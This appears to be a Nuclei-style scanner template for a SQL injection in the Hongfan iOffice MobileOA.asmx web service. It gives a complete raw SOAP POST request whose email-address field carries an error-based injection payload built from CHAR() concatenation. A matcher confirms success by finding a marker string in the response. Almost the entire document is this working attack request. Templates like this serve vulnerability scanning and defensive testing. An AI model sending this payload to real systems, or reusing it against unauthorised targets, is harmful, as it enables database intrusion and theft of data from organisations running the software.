id: hongfan-ioffice-MobileOA-sqli
info:
  name: 红帆 ioffice MobileOA.asmx - sqli
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://github.com/crushforyou/2025hvv-poc/blob/a09c3778c7df907941342afba5c18f08cd515d9c/MobileOA/%E6%99%BA%E8%83%BD%E5%8A%9E%E5%85%AC%E7%B3%BB%E7%BB%9F%20MobileOA.asmx%20SQL%E6%B3%A8%E5%85%A5.txt
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
    tips:
    repair:
    version:
  tags: hongfan,ioffice,sqli

http:
  - raw:
      - |
        POST /iOffice/prg/set/wss/MobileOA.asmx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
        Content-Type: text/xml; charset=utf-8

        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                      xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                      xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
            <GeMrNewData xmlns="http://tempuri.org/">
              <MobileOAEmailAddress>' AND 5079 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5079=5079) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)))-- eqJq</MobileOAEmailAddress>
            </GeMrNewData>
          </soap:Body>
        </soap:Envelope>
        
    matchers:
      - type: dsl
        dsl:
          # - status_code == 200
          - contains_all(body,'qzbq1qjpbq')
        condition: and